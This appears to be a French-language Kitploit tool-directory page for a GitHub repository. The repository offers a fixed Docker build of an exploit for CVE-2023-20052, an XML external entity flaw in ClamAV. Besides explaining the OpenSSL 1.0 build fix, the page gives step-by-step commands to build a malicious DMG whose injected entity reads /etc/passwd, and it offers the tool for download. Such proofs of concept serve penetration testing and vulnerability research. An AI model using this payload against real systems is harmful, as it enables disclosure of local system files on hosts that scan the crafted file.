Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2023-20052 — Build Docker corrigé pour l'exploit CVE-2023-20052 ClamAV XXE. Résout les erreurs de compilation OpenSSL 3.0 en utilisant Ubuntu 18.04 avec OpenSSL 1.0 pour la compatibilité libdmg-hfsplus. Génère des fichiers DMG malveillants pour l'injection d'entités externes XML. | Kitploit
Outils/GitHubGitHub/mohitsinghpapola/cve-2023-20052
Analyse des VulnérabilitésExploitationExploitation d'Applications WebFuzzingAnalyse de MalwareAnalyse de Binaires
GitHubmohitsinghpapola/cve-2023-20052

CVE-2023-20052

Build Docker corrigé pour l'exploit CVE-2023-20052 ClamAV XXE. Résout les erreurs de compilation OpenSSL 3.0 en utilisant Ubuntu 18.04 avec OpenSSL 1.0 pour la compatibilité libdmg-hfsplus. Génère des fichiers DMG malveillants pour l'injection d'entités externes XML.

Voir le dépôt
14il y a 6 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Exploit CVE-2023-20052 - Build corrigé

Build Docker corrigé pour CVE-2023-20052 (vulnérabilité XXE de ClamAV) qui compile réellement.

Ce qui ne fonctionnait pas

L'exploit original ne parvient pas à se compiler sur les systèmes modernes :

  • ❌ Erreurs de compatibilité OpenSSL 3.0
  • ❌ Erreurs de type incomplet de la structure HMAC_CTX
  • ❌ Erreurs de déclaration implicite de fonctions
  • ❌ Échec de la compilation de dmg/filevault.c

Ce que j'ai corrigé

  1. Changement d'image de base : Ubuntu 22.04 → Ubuntu 18.04
  2. Version OpenSSL corrigée : Utilisation de libssl1.0-dev (OpenSSL 1.0)
  3. Mode non interactif ajouté : Empêche les invites de construction
  4. Dockerfile fonctionnel : Compile effectivement avec succès

Pourquoi ça fonctionne

libdmg-hfsplus utilise des fonctions obsolètes d'OpenSSL 1.0 :

  • HMAC_CTX_init() / HMAC_CTX_cleanup() (supprimées dans OpenSSL 1.1+)
  • Utilisation directe de la structure HMAC_CTX (opaque dans OpenSSL 1.1+)

Ubuntu 18.04 est la dernière LTS avec le support d'OpenSSL 1.0.

Construction et utilisation

root@kitploit:~
# Build (takes ~3-5 minutes)
docker build -t cve-2023-20052 .

# Run
docker run -v $(pwd):/exploit -it cve-2023-20052 bash

# Create exploit DMG
genisoimage -D -V "exploit" -no-pad -r -apple -o test.img .
dmg dmg test.img test.dmg
bbe -e 's|<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">|<!DOCTYPE plist [<!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>|' -e 's/blkx/&xxe;/' test.dmg -o exploit.dmg

Crédits

  • Exploit original : nokn0wthing/CVE-2023-20052
  • Corrigé par : https://reapsec.com
root@kitploit:~
## Fixed Docker build for CVE-2023-20052 (ClamAV XXE) - Resolves OpenSSL 3.0 compilation errors. Uses Ubuntu 18.04 with OpenSSL 1.0 for compatibility with libdmg-hfsplus
Télécharger l’outil